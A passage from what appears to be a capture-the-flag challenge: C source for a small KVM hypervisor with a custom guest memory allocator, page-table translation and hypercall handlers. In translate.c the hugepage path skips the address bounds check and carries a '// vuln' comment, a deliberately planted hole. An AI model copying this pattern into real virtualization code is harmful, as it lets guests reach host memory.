fprintf(stderr, __VA_ARGS__) 7 | 8 | #define dump_segment_register(n, s) \ 9 | DEBUG_PRINT("%3s base=%016llx limit=%08x selector=%04x type=%02x dpl=%d db=%d l=%d g=%d avl=%d\n", \ 10 | (n), (s)->base, (s)->limit, (s)->selector, (s)->type, (s)->dpl, (s)->db, (s)->l, (s)->g, (s)->avl ) 11 | #define dump_dtable(n, s) \ 12 | DEBUG_PRINT("%3s base=%016llx limit=%04x \n", (n), (s)->base, (s)->limit) 13 | 14 | void dump_regs(int vcpufd){ 15 | int r; 16 | 17 | struct kvm_regs regs; 18 | r = ioctl(vcpufd, KVM_GET_REGS, ®s); 19 | assert(r != -1); 20 | 21 | DEBUG_PRINT("\n\nDump regs\n"); 22 | DEBUG_PRINT("rax=%016llx rbx=%016llx rcx=%016llx rdx=%016llx\n", 23 | regs.rax, regs.rbx, regs.rcx, regs.rdx); 24 | DEBUG_PRINT("rsi=%016llx rdi=%016llx rsp=%016llx rbp=%016llx\n", 25 | regs.rsi, regs.rdi, regs.rsp, regs.rbp); 26 | DEBUG_PRINT("r8 =%016llx r9 =%016llx r10=%016llx r11=%016llx\n", 27 | regs.r8, regs.r9, regs.r10, regs.r11); 28 | DEBUG_PRINT("r12=%016llx r13=%016llx r14=%016llx r15=%016llx\n", 29 | regs.r12, regs.r13, regs.r14, regs.r15); 30 | DEBUG_PRINT("rip=%016llx rflags=%016llx\n", regs.rip, regs.rflags); 31 | 32 | struct kvm_sregs sregs; 33 | r = ioctl(vcpufd, KVM_GET_SREGS, &sregs); 34 | assert(r != -1); 35 | 36 | dump_segment_register("cs", &sregs.cs); 37 | dump_segment_register("ds", &sregs.ds); 38 | dump_segment_register("es", &sregs.es); 39 | dump_segment_register("ss", &sregs.ss); 40 | dump_segment_register("tr", &sregs.tr); 41 | 42 | dump_dtable("gdt", &sregs.gdt); 43 | dump_dtable("ldt", &sregs.ldt); 44 | 45 | DEBUG_PRINT("cr0=%016llx\n", sregs.cr0); 46 | DEBUG_PRINT("cr2=%016llx\n", sregs.cr2); 47 | DEBUG_PRINT("cr3=%016llx\n", sregs.cr3); 48 | } 49 | -------------------------------------------------------------------------------- /kvm/utils/debug.h: -------------------------------------------------------------------------------- 1 | #ifndef _DEBUG_H 2 | #define _DEBUG_H 3 | 4 | void dump_regs(int vcpufd); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /kvm/utils/module.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "vm/vm.h" 9 | #include "utils/palloc.h" 10 | #include "utils/module.h" 11 | 12 | struct modules { 13 | unsigned nmod; 14 | int fds[]; 15 | } *mod_list; 16 | 17 | int init_modules(unsigned nmod, char *list[]){ 18 | int n = 0; 19 | 20 | if(!(mod_list = (struct modules*)malloc(sizeof(struct modules)+sizeof(int)*nmod))) 21 | return -1; 22 | 23 | for(int i = 0; i < nmod; i++){ 24 | int fd; 25 | struct stat stbuf; 26 | 27 | if((fd = open(list[i], O_RDONLY)) < 0){ 28 | perror(list[i]); 29 | continue; 30 | } 31 | 32 | if(fstat(fd, &stbuf) < -1){ 33 | perror("fstat"); 34 | goto err; 35 | } 36 | 37 | if(!S_ISREG(stbuf.st_mode)){ 38 | fprintf(stderr, "%s: Not a regular file\n", list[i]); 39 | goto err; 40 | } 41 | 42 | mod_list->fds[n++] = fd; 43 | continue; 44 | 45 | err: 46 | close(fd); 47 | } 48 | 49 | mod_list->nmod = n; 50 | if(!(mod_list = (struct modules*)realloc(mod_list, sizeof(struct modules)+sizeof(int)*n))) 51 | return -1; 52 | 53 | return n; 54 | } 55 | 56 | void fini_modules(void){ 57 | if(!mod_list) 58 | return; 59 | 60 | int nmod = mod_list->nmod; 61 | for(int i = 0; i < nmod; i++){ 62 | int fd = mod_list->fds[i]; 63 | if(fd >= 0) 64 | close(fd); 65 | } 66 | 67 | free(mod_list); 68 | mod_list = NULL; 69 | } 70 | 71 | int load_module(struct vm *vm, int id, uint64_t addr, off_t 
offset, size_t size){ 72 | int nmod; 73 | int fd; 74 | size_t aligned_size; 75 | 76 | if(!mod_list) 77 | return -1; 78 | nmod = mod_list->nmod; 79 | 80 | if(id >= nmod) 81 | return -1; 82 | fd = mod_list->fds[id]; 83 | 84 | if(fd < 0) 85 | return -1; 86 | 87 | if(!size){ 88 | struct stat stbuf; 89 | 90 | if(fstat(fd, &stbuf) < 0){ 91 | perror("fstat"); 92 | return -1; 93 | } 94 | 95 | size = stbuf.st_size; 96 | } 97 | 98 | if((addr = palloc(addr, aligned_size = (size + 0x1000-1) & ~0xfff)) == -1){ 99 | perror("palloc"); 100 | return -1; 101 | } 102 | memset(guest2host(vm, addr), 0, aligned_size); 103 | 104 | if(lseek(fd, offset, SEEK_SET) == -1){ 105 | perror("lseek"); 106 | return -1; 107 | } 108 | 109 | if(read(fd, guest2host(vm, addr), size) == -1){ 110 | perror("read"); 111 | return -1; 112 | } 113 | 114 | return addr; 115 | } 116 | 117 | int load_kernel(struct vm *vm){ 118 | return load_module(vm, 0, 0, 0, 0); 119 | } 120 | -------------------------------------------------------------------------------- /kvm/utils/module.h: -------------------------------------------------------------------------------- 1 | #ifndef _MODULE_H 2 | #define _MODULE_H 3 | 4 | int init_modules(unsigned nmod, char *list[]); 5 | void fini_modules(void); 6 | int load_module(struct vm *vm, int id, uint64_t addr, off_t offset, size_t size); 7 | int load_kernel(struct vm *vm); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /kvm/utils/palloc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define NBINS 128 7 | #define NSMALLBINS 64 8 | 9 | #define SMALLBIN_WIDTH GMALLOC_ALIGNMENT 10 | 11 | #define MIN_LARGE_SIZE (NSMALLBINS * SMALLBIN_WIDTH) 12 | #define IN_SMALLBIN_RANGE(sz) ((sz) < MIN_LARGE_SIZE) 13 | 14 | #define SMALLBIN_INDEX(sz) (((uint64_t)(sz)) >> 12) 15 | #define LARGEBIN_INDEX(sz) \ 16 | (((((uint64_t) (sz)) >> 14) <= 48) ? 48 + (((uint64_t) (sz)) >> 14) :\ 17 | ((((uint64_t) (sz)) >> 17) <= 20) ? 91 + (((uint64_t) (sz)) >> 17) :\ 18 | ((((uint64_t) (sz)) >> 20) <= 10) ? 110 + (((uint64_t) (sz)) >> 20) :\ 19 | ((((uint64_t) (sz)) >> 23) <= 4) ? 119 + (((uint64_t) (sz)) >> 23) :\ 20 | ((((uint64_t) (sz)) >> 27) <= 2) ? 124 + (((uint64_t) (sz)) >> 27) : 126) 21 | 22 | #define GMALLOC_ALIGNMENT (1 << 12) 23 | #define GMALLOC_ALIGN_MASK (GMALLOC_ALIGNMENT - 1) 24 | #define MINSIZE GMALLOC_ALIGNMENT 25 | #define REQUEST2SIZE(req) ((req) < MINSIZE ? 
MINSIZE : ((req) + GMALLOC_ALIGN_MASK) & ~GMALLOC_ALIGN_MASK) 26 | 27 | #define BIN_AT(av, idx) \ 28 | ((gmbinptr)((void*)&((av)->bins[(idx) * 2]) - offsetof(struct gmem_chunk, fd))) 29 | #define FIRST(b) ((b)->fd) 30 | #define LAST(b) ((b)->bk) 31 | 32 | #define CHUNK_MEM(p) ((p)->addr) 33 | #define CHUNK_SIZE(p) ((p)->size) 34 | #define INUSE(p) ((p)->fd == NULL) 35 | 36 | 37 | struct gmem_chunk { 38 | uint64_t addr; 39 | size_t size; 40 | struct gmem_chunk *fd, *bk; // free list 41 | struct gmem_chunk *next, *prev; // all chunks 42 | }; 43 | typedef struct gmem_chunk *gmchunkptr, *gmbinptr; 44 | 45 | struct gmem_state { 46 | unsigned initialized; 47 | 48 | gmchunkptr top; 49 | gmbinptr bins[NBINS*2]; 50 | 51 | size_t inuse; 52 | size_t system_mem; 53 | } arena; 54 | typedef struct gmem_state *gmstate; 55 | 56 | static gmchunkptr _int_palloc(gmstate av, size_t bytes); 57 | static gmchunkptr _int_palloc_manual(gmstate av, uint64_t addr, size_t bytes); 58 | static void _int_pfree(gmstate av, gmchunkptr p); 59 | 60 | void init_gmem_manage(size_t mem_size){ 61 | gmstate av = &arena; 62 | gmchunkptr top; 63 | 64 | top = (gmchunkptr)calloc(1, sizeof(struct gmem_chunk)); 65 | top->addr = 0; 66 | top->size = mem_size; 67 | top->fd = top->bk = NULL; 68 | top->next = top->prev = NULL; 69 | 70 | av->top = top; 71 | av->inuse = 0; 72 | av->system_mem = mem_size; 73 | 74 | for(int i = 0; i < NBINS; i++){ 75 | gmbinptr bin = BIN_AT(av, i); 76 | bin->fd = bin->bk = bin; 77 | } 78 | 79 | av->initialized = 1; 80 | } 81 | 82 | uint64_t palloc(uint64_t addr, size_t bytes){ 83 | gmstate av = &arena; 84 | gmchunkptr p; 85 | 86 | if(!av->initialized || addr > av->system_mem || bytes > av->system_mem - av->inuse) 87 | return -1; 88 | 89 | if((p = addr ? _int_palloc_manual(av, addr, bytes) : _int_palloc(av, bytes))){ 90 | uint64_t mem; 91 | 92 | assert((mem = CHUNK_MEM(p)) < av->system_mem); 93 | av->inuse += CHUNK_SIZE(p); 94 | 95 | return mem; 96 | } 97 | 98 | return -1; 99 | } 100 | 101 | int pfree(uint64_t addr){ 102 | gmstate av = &arena; 103 | gmchunkptr p; 104 | 105 | if(!av->initialized || addr > av->system_mem) 106 | return -1; 107 | 108 | for(p = av->top; p; p = p->prev) 109 | if(CHUNK_MEM(p) == addr){ 110 | _int_pfree(av, p); 111 | av->inuse -= CHUNK_SIZE(p); 112 | return 0; 113 | } 114 | 115 | return -1; 116 | } 117 | 118 | uint64_t get_gmem_info(int menu){ 119 | gmstate av = &arena; 120 | 121 | switch(menu){ 122 | case 0: 123 | return av->initialized; 124 | case 1: 125 | return av->system_mem; 126 | case 2: 127 | return av->inuse; 128 | } 129 | return -1; 130 | } 131 | 132 | static void unlink_freelist(gmchunkptr p); 133 | static void link_bins(gmstate av, gmchunkptr p); 134 | static void _alloc_split(gmstate av, gmchunkptr p, size_t nb); 135 | static gmchunkptr _alloc_top(gmstate av, size_t nb); 136 | 137 | static gmchunkptr _int_palloc(gmstate av, size_t bytes){ 138 | gmchunkptr victim; 139 | 140 | size_t nb; 141 | unsigned idx; 142 | gmbinptr bin; 143 | 144 | nb = REQUEST2SIZE(bytes); 145 | 146 | if(IN_SMALLBIN_RANGE(nb)){ 147 | idx = SMALLBIN_INDEX(nb); 148 | bin = BIN_AT(av, idx); 149 | 150 | if((victim = LAST(bin)) && victim != bin){ 151 | unlink_freelist(victim); 152 | goto alloc_complete; 153 | } 154 | 155 | idx++; 156 | } 157 | else { 158 | idx = LARGEBIN_INDEX(nb); 159 | bin = BIN_AT(av, idx); 160 | 161 | if((victim = FIRST(bin)) == bin || CHUNK_SIZE(victim) < nb) 162 | goto next_bin; 163 | 164 | for(victim = LAST(bin); CHUNK_SIZE(victim) < nb; victim = victim->bk); 165 | 166 | 
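		/* editor's note: large bins are kept sorted by size in link_bins, so the
		   scan above stops at the smallest free chunk that still fits nb (best
		   fit); it is unlinked and any remainder is split back into the bins */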
unlink_freelist(victim); 167 | _alloc_split(av, victim, nb); 168 | 169 | goto alloc_complete; 170 | } 171 | 172 | next_bin: 173 | for(; idx= NSMALLBINS){ 180 | if(CHUNK_SIZE(victim) < nb) 181 | continue; 182 | 183 | for(victim = LAST(bin); CHUNK_SIZE(victim) < nb; victim = victim->bk); 184 | } 185 | 186 | unlink_freelist(victim); 187 | _alloc_split(av, victim, nb); 188 | 189 | goto alloc_complete; 190 | } 191 | 192 | if(!(victim = _alloc_top(av, nb))) 193 | return NULL; 194 | 195 | alloc_complete: 196 | return victim; 197 | } 198 | 199 | static gmchunkptr _int_palloc_manual(gmstate av, uint64_t addr, size_t bytes){ 200 | gmchunkptr victim, tmp = NULL; 201 | size_t nb; 202 | 203 | if(addr & GMALLOC_ALIGN_MASK) 204 | return NULL; 205 | 206 | nb = REQUEST2SIZE(bytes); 207 | 208 | for(victim = av->top; victim && CHUNK_MEM(victim) > addr; victim = victim->prev); 209 | 210 | if(!victim) 211 | return NULL; 212 | 213 | if(victim == av->top){ 214 | if(addr-CHUNK_MEM(victim) > 0){ 215 | _alloc_split(av, victim, addr-CHUNK_MEM(victim)); 216 | tmp = victim; 217 | } 218 | 219 | victim = _alloc_top(av, nb); 220 | } 221 | else { 222 | if(INUSE(victim) || CHUNK_MEM(victim)+CHUNK_SIZE(victim) < addr+nb) 223 | return NULL; 224 | 225 | if(addr-CHUNK_MEM(victim) > 0){ 226 | _alloc_split(av, victim, addr-CHUNK_MEM(victim)); 227 | tmp = victim; 228 | victim = victim->next; 229 | } 230 | 231 | _alloc_split(av, victim, nb); 232 | } 233 | 234 | if(tmp) 235 | _int_pfree(av, tmp); 236 | 237 | return victim; 238 | } 239 | 240 | static void _int_pfree(gmstate av, gmchunkptr p){ 241 | gmchunkptr next, prev; 242 | 243 | next = p->next; 244 | prev = p->prev; 245 | 246 | if(CHUNK_MEM(p)) 247 | assert(prev); 248 | assert(next); 249 | 250 | if(prev && !INUSE(prev)){ 251 | unlink_freelist(prev); 252 | 253 | prev->next = next; 254 | next->prev = prev; 255 | CHUNK_SIZE(prev) += CHUNK_SIZE(p); 256 | 257 | free(p); 258 | p = prev; 259 | prev = p->prev; 260 | } 261 | 262 | if(next == av->top){ 263 | gmchunkptr top = av->top; 264 | 265 | prev->next = top; 266 | top->prev = prev; 267 | 268 | CHUNK_MEM(top) = CHUNK_MEM(p); 269 | CHUNK_SIZE(top) += CHUNK_SIZE(p); 270 | 271 | free(p); 272 | return; 273 | } 274 | 275 | if (!INUSE(next)){ 276 | unlink_freelist(next); 277 | 278 | prev->next = next; 279 | next->prev = prev; 280 | CHUNK_MEM(next) = CHUNK_MEM(p); 281 | CHUNK_SIZE(next) += CHUNK_SIZE(p); 282 | 283 | free(p); 284 | p = next; 285 | } 286 | 287 | link_bins(av, p); 288 | } 289 | 290 | static void unlink_freelist(gmchunkptr p){ 291 | gmchunkptr fwd, bck; 292 | 293 | fwd = p->fd; 294 | bck = p->bk; 295 | 296 | assert(fwd->bk == p && bck->fd == p); 297 | 298 | fwd->bk = bck; 299 | bck->fd = fwd; 300 | 301 | p->fd = p->bk = NULL; 302 | } 303 | 304 | static void link_bins(gmstate av, gmchunkptr p){ 305 | gmchunkptr fwd, bck; 306 | size_t size; 307 | unsigned idx; 308 | 309 | assert(p->fd == NULL && p->bk == NULL); 310 | 311 | size = CHUNK_SIZE(p); 312 | if(IN_SMALLBIN_RANGE(size)){ 313 | idx = SMALLBIN_INDEX(size); 314 | bck = BIN_AT(av, idx); 315 | fwd = bck->fd; 316 | } 317 | else { 318 | idx = LARGEBIN_INDEX(size); 319 | bck = BIN_AT(av, idx); 320 | fwd = bck->fd; 321 | 322 | if(fwd == bck) 323 | goto link; 324 | 325 | if(size < CHUNK_SIZE(bck->bk)){ 326 | fwd = bck; 327 | bck = fwd->bk; 328 | goto link; 329 | } 330 | 331 | while(size < CHUNK_SIZE(fwd)) 332 | fwd = fwd->fd; 333 | 334 | bck = fwd->bk; 335 | } 336 | 337 | link: 338 | p->fd = fwd; 339 | p->bk = bck; 340 | bck->fd = fwd->bk = p; 341 | } 342 | 343 | static void 
_alloc_split(gmstate av, gmchunkptr p, size_t nb){ 344 | size_t size, remainder_size; 345 | gmchunkptr remainder; 346 | 347 | size = CHUNK_SIZE(p); 348 | assert(nb && size >= nb); 349 | 350 | remainder_size = size - nb; 351 | if(!remainder_size) 352 | return; 353 | 354 | remainder = (gmchunkptr)calloc(1, sizeof(struct gmem_chunk)); 355 | CHUNK_MEM(remainder) = CHUNK_MEM(p) + nb; 356 | CHUNK_SIZE(remainder) = remainder_size; 357 | remainder->next = p->next; 358 | remainder->prev = p; 359 | 360 | p->size = nb; 361 | p->next = remainder; 362 | 363 | if(p == av->top){ 364 | remainder->fd = remainder->bk = NULL; 365 | av->top = remainder; 366 | } 367 | else 368 | link_bins(av, remainder); 369 | } 370 | 371 | static gmchunkptr _alloc_top(gmstate av, size_t nb){ 372 | gmchunkptr victim; 373 | 374 | victim = av->top; 375 | if(!victim || CHUNK_SIZE(victim) < nb) 376 | return NULL; 377 | 378 | _alloc_split(av, victim, nb); 379 | 380 | return victim; 381 | } 382 | -------------------------------------------------------------------------------- /kvm/utils/palloc.h: -------------------------------------------------------------------------------- 1 | #ifndef _MEM_MANAGE_H 2 | #define _MEM_MANAGE_H 3 | 4 | #include 5 | 6 | void init_gmem_manage(size_t mem_size); 7 | uint64_t palloc(uint64_t addr, size_t size); 8 | int pfree(uint64_t addr); 9 | uint64_t get_gmem_info(int menu); 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /kvm/utils/translate.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "vm/vm.h" 6 | #include "bits.h" 7 | 8 | /* 9 | uint64_t translate(int vcpufd, uint64_t addr, int writeable, int user){ 10 | struct kvm_translation trans; 11 | 12 | trans.linear_address = addr; 13 | trans.usermode = 3; 14 | if(ioctl(vcpufd, KVM_TRANSLATE, &trans)){ 15 | perror("ioctl KVM_TRANSLATE"); 16 | return 0; 17 | } 18 | 19 | printf("la %p -> pa:%p, v:%d w:%x, u:%x\n", addr, trans.physical_address, trans.valid, trans.writeable, trans.usermode); 20 | 21 | if(!trans.valid) 22 | return 0; 23 | 24 | //if(writeable && !trans.writeable) 25 | // return 0; 26 | 27 | //if(user && !trans.usermode) 28 | // return 0; 29 | 30 | return trans.physical_address; 31 | } 32 | */ 33 | 34 | #define CHK_PERMISSION(entry) (((entry) & PDE64_PRESENT) && \ 35 | (!user || (entry) & PDE64_USER) && \ 36 | (!write || (entry) & PDE64_RW)) 37 | uint64_t translate(struct vm *vm, uint64_t pml4_addr, uint64_t laddr, int write, int user){ 38 | uint16_t idx[] = { (laddr>>39) & 0x1ff, (laddr>>30) & 0x1ff, (laddr>>21) & 0x1ff, (laddr>>12) & 0x1ff }; 39 | uint64_t paddr = -1; 40 | 41 | uint64_t *pml4 = guest2host(vm, pml4_addr); 42 | 43 | uint64_t pdpt_addr = pml4[idx[0]] & ~0xfff; 44 | if(!CHK_PERMISSION(pml4[idx[0]])) 45 | goto end; 46 | uint64_t *pdpt = guest2host(vm, pdpt_addr); 47 | 48 | uint64_t pd_addr = pdpt[idx[1]] & ~0xfff; 49 | if(!CHK_PERMISSION(pdpt[idx[1]])) 50 | goto end; 51 | uint64_t *pd = guest2host(vm, pd_addr); 52 | 53 | uint64_t pt_addr = pd[idx[2]] & ~0xfff; 54 | if(!CHK_PERMISSION(pd[idx[2]])) 55 | goto end; 56 | if(pd[idx[2]] & PDE64_PS){ 57 | if(pd[idx[2]] & PDE64_USER) // user does not support hugepage 58 | goto end; 59 | 60 | paddr = pt_addr | (laddr&0x1fffff); 61 | goto end; // vuln 62 | } 63 | 64 | uint64_t *pt = guest2host(vm, pt_addr); 65 | if(!CHK_PERMISSION(pt[idx[3]])) 66 | goto end; 67 | 68 | paddr = (pt[idx[3]] & ~0xfff) | (laddr&0xfff); 69 | assert_addr(vm, 
paddr); 70 | end: 71 | //printf("laddr:%p -> paddr:%p\n", laddr, paddr); 72 | return paddr; 73 | } 74 | -------------------------------------------------------------------------------- /kvm/utils/translate.h: -------------------------------------------------------------------------------- 1 | #ifndef _TRANSLATION_H 2 | #define _TRANSLATION_H 3 | 4 | #include 5 | #include "vm/vm.h" 6 | 7 | //uint64_t translate(int vcpufd, uint64_t addr, int writeable, int user); 8 | uint64_t translate(struct vm *vm, uint64_t pml4_addr, uint64_t addr, int write, int user); 9 | 10 | #endif 11 | -------------------------------------------------------------------------------- /kvm/vm/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := vm.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /kvm/vm/kvm_handler.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "vm/vm.h" 8 | #include "vm/kvm_handler.h" 9 | #include "utils/translate.h" 10 | #include "utils/palloc.h" 11 | #include "utils/module.h" 12 | 13 | #define foreach_gpage(a, l) \ 14 | for(uint64_t size, gvaddr = (a), len = (l), endaddr = gvaddr + len; \ 15 | endaddr > gvaddr && (size = ((endaddr & ~((1<<12)-1)) > gvaddr) ? (((~gvaddr)+1) & ((1<<12)-1) ?: 1<<12) : len ) > 0; \ 16 | gvaddr += size, len -= size) 17 | 18 | int kvm_handle_io(struct vm *vm, struct vcpu *vcpu){ 19 | /* 20 | int vcpufd = vcpu->fd; 21 | struct kvm_run *run = vcpu->run; 22 | */ 23 | return 0; 24 | } 25 | 26 | int kvm_handle_hypercall(struct vm *vm, struct vcpu *vcpu){ 27 | struct kvm_regs regs; 28 | struct kvm_sregs sregs; 29 | int vcpufd = vcpu->fd; 30 | unsigned long ret = -1; 31 | 32 | if(ioctl(vcpufd, KVM_GET_REGS, ®s) < 0){ 33 | perror("ioctl KVM_GET_REGS"); 34 | return -1; 35 | } 36 | if(ioctl(vcpufd, KVM_GET_SREGS, &sregs) < 0){ 37 | perror("ioctl KVM_GET_SREGS"); 38 | return -1; 39 | } 40 | 41 | unsigned nr = regs.rax; 42 | unsigned long arg[] = {regs.rbx, regs.rcx, regs.rdx, regs.rsi}; 43 | 44 | #ifdef DEBUG 45 | printf("nr : %d\n", nr); 46 | #endif 47 | switch(nr){ 48 | case 0x10: // read(0, buf, size) 49 | ret = 0; 50 | foreach_gpage(arg[0], arg[1]){ // uint64_t gvaddr, size; 51 | ssize_t n; 52 | uint64_t gpaddr; 53 | 54 | if((gpaddr = translate(vm, sregs.cr3, gvaddr, 1, arg[2])) == -1) 55 | break; 56 | n = read(STDIN_FILENO, guest2host(vm, gpaddr), size); 57 | ret += n; 58 | 59 | if(n < size) 60 | break; 61 | } 62 | break; 63 | case 0x11: // write(1, buf, size) 64 | ret = 0; 65 | foreach_gpage(arg[0], arg[1]){ // uint64_t gvaddr, size; 66 | ssize_t n; 67 | uint64_t gpaddr; 68 | 69 | if((gpaddr = translate(vm, sregs.cr3, gvaddr, 0, arg[2])) == -1) 70 | break; 71 | n = write(STDOUT_FILENO, guest2host(vm, gpaddr), size); 72 | ret += n; 73 | 74 | if(n < size) 75 | break; 76 | } 77 | break; 78 | case 0x20: 79 | ret = get_gmem_info(arg[0]); 80 | break; 81 | case 0x21: // palloc(phys_addr, size=0) 82 | if((ret = palloc(arg[0], arg[1])) != -1) 83 | memset(guest2host(vm, ret), 0, arg[1]); 84 | break; 85 | case 0x22: // pfree(phys_addr); 86 | ret = pfree(arg[0]); 87 | break; 88 | case 0x30: // load_module(id, phys_addr=0, offset=0, size=0) 89 | ret = load_module(vm, arg[0], arg[1], arg[2], arg[3]); 90 | break; 91 | } 92 | #ifdef DEBUG 93 | printf("ret : %d\n", ret); 94 | #endif 95 | 96 | regs.rax = ret; 97 | regs.rip += 3; 98 | 99 | 
if(ioctl(vcpufd, KVM_SET_REGS, ®s) < 0){ 100 | perror("ioctl KVM_SET_REGS"); 101 | return -1; 102 | } 103 | 104 | return 0; 105 | } 106 | 107 | #define MSR_STAR 0xc0000081; 108 | #define MSR_LSTAR 0xc0000082; 109 | #define MSR_SFMASK 0xc0000084; 110 | 111 | /* 112 | #define base(s) ((((s)>>16)&0xffffff) | ((((s)>>56)&0xff)<<24)) 113 | #define limit(s) (((s)&0xffff) | ((((s)>>48)&0xf)<<16)) 114 | #define type(s) (((s)>>40)&0xf) 115 | #define s(s) (((s)>>44)&1) 116 | #define dpl(s) (((s)>>45)&3) 117 | #define present(s) (((s)>>47)&1) 118 | #define l(s) (((s)>>53)&1) 119 | #define db(s) (((s)>>54)&1) 120 | #define g(s) (((s)>>55)&1) 121 | 122 | #define extract_segment(sel, sval) { \ 123 | .selector = (sel), \ 124 | .base = base((sval)), \ 125 | .limit = limit((sval)), \ 126 | .type = type((sval)), \ 127 | .s = s((sval)), \ 128 | .dpl = dpl((sval)), \ 129 | .present = present((sval)), \ 130 | .l = l((sval)), \ 131 | .db = db((sval)), \ 132 | .g = g((sval)), \ 133 | } 134 | */ 135 | 136 | int kvm_handle_syscall(struct vm *vm, struct vcpu *vcpu){ 137 | int vcpufd = vcpu->fd; 138 | int ret = -1; 139 | 140 | struct kvm_regs regs; 141 | struct kvm_sregs sregs; 142 | struct kvm_msrs *msrs = (struct kvm_msrs*)malloc(sizeof(struct kvm_msrs)+sizeof(struct kvm_msr_entry)*3); 143 | 144 | if(!msrs) 145 | return -1; 146 | 147 | msrs->nmsrs = 3; 148 | msrs->entries[0].index = MSR_STAR; 149 | msrs->entries[1].index = MSR_LSTAR; 150 | msrs->entries[2].index = MSR_SFMASK; 151 | 152 | if(ioctl(vcpufd, KVM_GET_MSRS, msrs) < 0){ 153 | perror("ioctl KVM_GET_MSRS"); 154 | goto err; 155 | } 156 | if(ioctl(vcpufd, KVM_GET_REGS, ®s) < 0){ 157 | perror("ioctl KVM_GET_REGS"); 158 | goto err; 159 | } 160 | if(ioctl(vcpufd, KVM_GET_SREGS, &sregs) < 0){ 161 | perror("ioctl KVM_GET_SREGS"); 162 | goto err; 163 | } 164 | 165 | uint16_t kernel_cs = msrs->entries[0].data >> 32; 166 | uint64_t syscall_handler = msrs->entries[1].data; 167 | uint64_t flag_mask = msrs->entries[2].data; 168 | 169 | regs.rcx = regs.rip + 2; 170 | regs.r11 = regs.rflags; 171 | regs.rip = syscall_handler; 172 | regs.rflags &= flag_mask; 173 | //printf("%x:%p\n", kernel_cs, regs.rip); 174 | 175 | /* 176 | uint64_t *gdt_base = (uint64_t*)translate(vcpufd, sregs.gdt.base); 177 | if(!gdt_base) 178 | goto err; 179 | 180 | gdt_base = (uint64_t*)guest2host(vm, (uint64_t)gdt_base); 181 | 182 | uint64_t cs_raw = gdt_base[kernel_cs/8], ss_raw = gdt_base[kernel_cs/8 + 1]; 183 | struct kvm_segment cs = extract_segment(kernel_cs, cs_raw); 184 | struct kvm_segment ss = extract_segment(kernel_cs + 8, ss_raw); 185 | */ 186 | struct kvm_segment seg = { 187 | .base = 0, 188 | .limit = 0xffffffff, 189 | .selector = kernel_cs, 190 | .present = 1, 191 | .type = 11, 192 | .dpl = 0, 193 | .db = 0, 194 | .s = 1, 195 | .l = 1, 196 | .g = 1, 197 | }; 198 | sregs.cs = seg; 199 | seg.type = 3; 200 | seg.selector = kernel_cs + 8; 201 | sregs.ss = seg; 202 | 203 | if(ioctl(vcpufd, KVM_SET_SREGS, &sregs) < 0){ 204 | perror("ioctl KVM_SET_SREGS"); 205 | goto err; 206 | } 207 | 208 | if(ioctl(vcpufd, KVM_SET_REGS, ®s) < 0){ 209 | perror("ioctl KVM_SET_REGS"); 210 | goto err; 211 | } 212 | 213 | ret = 0; 214 | err: 215 | free(msrs); 216 | return ret; 217 | } 218 | -------------------------------------------------------------------------------- /kvm/vm/kvm_handler.h: -------------------------------------------------------------------------------- 1 | #ifndef _KVM_HANDLER_H 2 | #define _KVM_HANDLER_H 3 | 4 | #include 5 | #include "vm.h" 6 | 7 | int kvm_handle_io(struct vm *vm, struct 
vcpu *vcpu); 8 | int kvm_handle_hypercall(struct vm *vm, struct vcpu *vcpu); 9 | int kvm_handle_syscall(struct vm *vm, struct vcpu *vcpu); 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /kvm/vm/vm.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include "bits.h" 12 | #include "vm/vm.h" 13 | #include "vm/kvm_handler.h" 14 | #include "utils/palloc.h" 15 | #include "utils/translate.h" 16 | #include "utils/debug.h" 17 | 18 | static int init_vcpu(int fd, struct vm *vm); 19 | static int init_memory(struct vm *vm); 20 | static int set_long_mode(struct vm *vm, int vcpufd); 21 | 22 | struct vm *init_vm(unsigned ncpu, size_t mem_size){ 23 | struct vm *vm = NULL; 24 | int fd, vmfd; 25 | 26 | if(ncpu < 1 || ncpu > 4) 27 | return NULL; 28 | 29 | if((fd = open("/dev/kvm", O_RDONLY)) < 0){ 30 | perror("open /dev/kvm"); 31 | goto end; 32 | } 33 | 34 | if((vmfd = ioctl(fd, KVM_CREATE_VM, 0)) < 0){ 35 | perror("ioctl KVM_CREATE_VM"); 36 | goto end; 37 | } 38 | 39 | if(!(vm = (struct vm*)calloc(sizeof(struct vm)+sizeof(struct vcpu)*ncpu, 1))){ 40 | perror("malloc (struct vm)"); 41 | goto end; 42 | } 43 | 44 | vm->vmfd = vmfd; 45 | vm->ncpu = ncpu; 46 | vm->mem_size = mem_size; 47 | init_gmem_manage(mem_size); 48 | 49 | if(init_vcpu(fd, vm) < ncpu || init_memory(vm) < 0){ 50 | free(vm); 51 | vm = NULL; 52 | } 53 | 54 | end: 55 | close(fd); 56 | return vm; 57 | } 58 | 59 | static int init_vcpu(int fd, struct vm *vm){ 60 | size_t mmap_size; 61 | int i; 62 | 63 | if((mmap_size = ioctl(fd, KVM_GET_VCPU_MMAP_SIZE, NULL)) <= 0){ 64 | perror("ioctl KVM_GET_VCPU_MMAP_SIZE"); 65 | return -1; 66 | } 67 | 68 | for(i = 0; i < vm->ncpu; i++){ 69 | struct vcpu *vcpu = &vm->vcpu[i]; 70 | int vcpufd; 71 | struct kvm_run *run; 72 | 73 | if((vcpufd = ioctl(vm->vmfd, KVM_CREATE_VCPU, i)) < 0){ 74 | perror("ioctl KVM_CREATE_VCPU"); 75 | break; 76 | } 77 | 78 | run = (struct kvm_run *)mmap(NULL, mmap_size, PROT_READ|PROT_WRITE, MAP_SHARED, vcpufd, 0); 79 | if(run == MAP_FAILED){ 80 | perror("mmap (struct kvm_run)"); 81 | break; 82 | } 